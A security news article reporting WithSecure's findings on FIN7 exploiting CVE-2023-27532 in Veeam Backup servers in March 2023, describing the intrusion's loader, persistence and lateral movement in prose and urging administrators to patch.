FIN7 Operators Seeks Out Veeam Backup Servers for Network Compromise

Financially motivated threat group, FIN7 is discovered to be exploiting vulnerabilities in Veeam Backup and Replication software for data compromise. In a report from WithSecure Intelligence, researchers observed an attack on March 28th, 2023, with shell commands executed from a Veeam Backup instance. WithSecure attributed the attack to FIN7 operators or attackers with access to "FIN7 tradecraft." With "low-to-medium confidence," WithSecure assessed the attackers exploited CVE-2023-27532 allowing unauthorized users within the network perimeter to access encrypted credentials stored in the configuration database of the exposed Veeam server. Additional observations of the exploited server found probing activity a few days prior, communication port 9401 for Veeam Backup Service over SSL was opened, servers were vulnerable to CVE-2023-27532 and the release of a proof-of-concept (POC) CVE-2023-27532 by Horizon3 on March 23rd, preceded the attack by a few days. "The POC contains remote command execution functionality. The remote command execution, which is achieved through SQL shell commands, yields the same execution chain observed in this campaign," said WithSecure.

The shell commands initiated the download and execution of a PowerShell script from a 'sqlservr.exe' process. Analysis of the PowerShell scripts found they were POWERTRASH, "an obfuscated loader written in PowerShell that has been attributed to FIN7." The naming convention of the scripts aligns with files having been deployed by FIN7 in other campaigns. WithSecure's incident timeline indicates the intrusion spanned two days. Reconnaissance commands were launched to identify network connections, running processes, IP configurations and registry settings for Veeam. For persistence, a new account was created using WMIC. Several PowerShell scripts launched from the operator also aided in creating persistence in the registry. Lateral movement was first tested using WMI method invocations. WithSecure identified attackers transferring two of their PowerShell by dropping them into ADMIN$ share of the remote host using SMB and executed "through remote service creation." The scripts were used to enumerate the target hose and "performed remote injection into the ‘PlugPlay’ service, making a network connection to a remote host on port 443." WithSecure has not determined the objective of the attacker in this campaign, and the specific exploit of Veeam remains unknown. However, the Veeam software is within the threat actor's attack scope, underscoring the urgency for administrators to patch and defend their servers.